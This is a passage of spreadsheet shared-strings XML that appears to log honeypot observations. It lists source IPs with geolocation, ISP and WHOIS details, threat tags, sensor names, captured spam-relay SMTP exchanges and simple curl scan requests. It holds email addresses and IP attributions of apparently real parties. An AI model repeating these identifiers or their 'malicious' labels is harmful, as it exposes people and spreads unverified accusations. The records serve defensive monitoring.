    <t>1565022</t>
  </si>
  <si>
    <t>10.9804</t>
  </si>
  <si>
    <t>106.652</t>
  </si>
  <si>
    <t>45557</t>
  </si>
  <si>
    <t>Vietnam Technology and Telecommunication JSC</t>
  </si>
  <si>
    <t>HP-VNTT</t>
  </si>
  <si>
    <t>query&amp;&amp;connection</t>
  </si>
  <si>
    <t>::ffff:6799:dafa</t>
  </si>
  <si>
    <t>e2931e7b101804934ee1673ee247a468</t>
  </si>
  <si>
    <t>196.251.92.15</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body</t>
  </si>
  <si>
    <t>25&amp;&amp;3389</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 1 Mar 2025 07:13:52 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;b.a.n.k80@outlook.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;aurashipllc@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;janetdifiore00@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;o.f.f.i.c.e00@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 14 Mar 2025 00:04:13 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 4 Apr 2025 04:10:40 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@tianqixuda.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mrtmsmith809@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;sgreenstarexpress@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;ShukhratYakubovich@outlook.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mukhamederovshukhraty@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;kenan.imirzaliolu@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}</t>
  </si>
  <si>
    <t>::ffff:c4fb:5c0f</t>
  </si>
  <si>
    <t>4232d9123ca213674d33e429b904bdab</t>
  </si>
  <si>
    <t>50.68.20.19</t>
  </si>
  <si>
    <t>NA&amp;&amp;S01069404e3e42776.vc.shawcable.net</t>
  </si>
  <si>
    <t>Vancouver</t>
  </si>
  <si>
    <t>49.2497</t>
  </si>
  <si>
    <t>-123.119</t>
  </si>
  <si>
    <t>2010-10-28</t>
  </si>
  <si>
    <t>SHAW-COMM</t>
  </si>
  <si>
    <t>1999-11-05 20:23:22</t>
  </si>
  <si>
    <t>2025-11-05 20:23:22</t>
  </si>
  <si>
    <t>2025-02-20 16:03:56</t>
  </si>
  <si>
    <t>['A1-220.AKAM.NET', 'A3-64.AKAM.NET', 'A6-65.AKAM.NET', 'A8-66.AKAM.NET', 'A9-67.AKAM.NET', 'NS7NOCG.SHAWCABLE.NET', 'NS8SOCG.SHAWCABLE.NET', 'NS9HTOK.SHAWCABLE.NET']</t>
  </si>
  <si>
    <t>WEBNAMES.CA INC</t>
  </si>
  <si>
    <t>['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited']</t>
  </si>
  <si>
    <t>Rogers Communications Canada Inc.</t>
  </si>
  <si>
    <t>['abuse@webnames.ca', 'domadmin@rci.rogers.com']</t>
  </si>
  <si>
    <t>333 Bloor Street East</t>
  </si>
  <si>
    <t>::ffff:3244:1413</t>
  </si>
  <si>
    <t>46b3a9951a130164fd81eaabecb34c4a</t>
  </si>
  <si>
    <t>117.235.57.197</t>
  </si>
  <si>
    <t>::ffff:75eb:39c5</t>
  </si>
  <si>
    <t>449237ceae641de311ed9b3c75b307ec</t>
  </si>
  <si>
    <t>120.61.86.13</t>
  </si>
  <si>
    <t>::ffff:783d:560d</t>
  </si>
  <si>
    <t>5c5055d84710b34df9eef5fde68f31c0</t>
  </si>
  <si>
    <t>23.24.173.214</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>Medley</t>
  </si>
  <si>
    <t>4163952</t>
  </si>
  <si>
    <t>33178</t>
  </si>
  <si>
    <t>25.8597</t>
  </si>
  <si>
    <t>-80.3723</t>
  </si>
  <si>
    <t>Tropical Shipping</t>
  </si>
  <si>
    <t>::ffff:1718:add6</t>
  </si>
  <si>
    <t>9326bf86be663c4f4bc83445c0a7473e</t>
  </si>
  <si>
    <t>1.34.94.21</t>
  </si>
  <si>
    <t>NA&amp;&amp;1-34-94-21.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;15572&amp;&amp;23&amp;&amp;42216&amp;&amp;42231&amp;&amp;42269&amp;&amp;42250&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:122:5e15</t>
  </si>
  <si>
    <t>99424d501df8084dd206a31fc279dad4</t>
  </si>
  <si>
    <t>122.116.55.232</t>
  </si>
  <si>
    <t>122-116-55-232.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;38515&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a74:37e8</t>
  </si>
  <si>
    <t>0f720a2fca2f72146e71866760384902</t>
  </si>
  <si>
    <t>59.126.197.24</t>
  </si>
  <si>
    <t>59-126-197-24.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;38740&amp;&amp;80&amp;&amp;23&amp;&amp;9100&amp;&amp;3285&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:c518</t>
  </si>
  <si>
    <t>705ab59bf8958763ca2d94305142f3fe</t>
  </si>
  <si>
    <t>59.127.131.73</t>
  </si>
  <si>
    <t>59-127-131-73.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7f:8349</t>
  </si>
  <si>
    <t>0fa4b0a6b897840c0fa75285a9ee9acd</t>
  </si>
  <si>
    <t>114.34.85.96</t>
  </si>
  <si>
    <t>114-34-85-96.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;9100&amp;&amp;80&amp;&amp;12848</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7222:5560</t>
  </si>
  <si>
    <t>3239bb8085222d6f897f627cd3e882da</t>
  </si>
  <si>
    <t>113.61.149.111</t>
  </si>
  <si>
    <t>NA&amp;&amp;113-61-149-111.veetime.com</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>24.1373</t>
  </si>
  <si>
    <t>120.646</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:713d:956f</t>
  </si>
  <si>
    <t>48409d8dc0636172daf823c3eccd0c6f</t>
  </si>
  <si>
    <t>220.133.28.187</t>
  </si>
  <si>
    <t>220-133-28-187.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H25&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;51189&amp;&amp;23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc85:1cbb</t>
  </si>
  <si>
    <t>485279acade9414091a5db3b84b93a38</t>
  </si>
  <si>
    <t>114.33.109.78</t>
  </si>
  <si>
    <t>114-33-109-78.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H33&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;27639&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7221:6d4e</t>
  </si>
  <si>
    <t>3853a9608efd4d2c25fa6f9519134b45</t>
  </si>
  <si>
    <t>125.228.159.145</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-159-145.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40</t>
  </si>
  <si>
    <t>23&amp;&amp;34514&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7de4:9f91</t>
  </si>
  <si>
    <t>c068c818b95ca45b772600edb159889b</t>
  </si>
  <si>
    <t>125.228.31.206</t>
  </si>
  <si>
    <t>125-228-31-206.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>25935&amp;&amp;35220&amp;&amp;80&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:1fce</t>
  </si>
  <si>
    <t>739ffaa7a748714cc6a3ccc56b72b1e4</t>
  </si>
  <si>
    <t>220.134.93.244</t>
  </si>
  <si>
    <t>220-134-93-244.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;25658&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100&amp;&amp;53200&amp;&amp;53211</t>
  </si>
  <si>
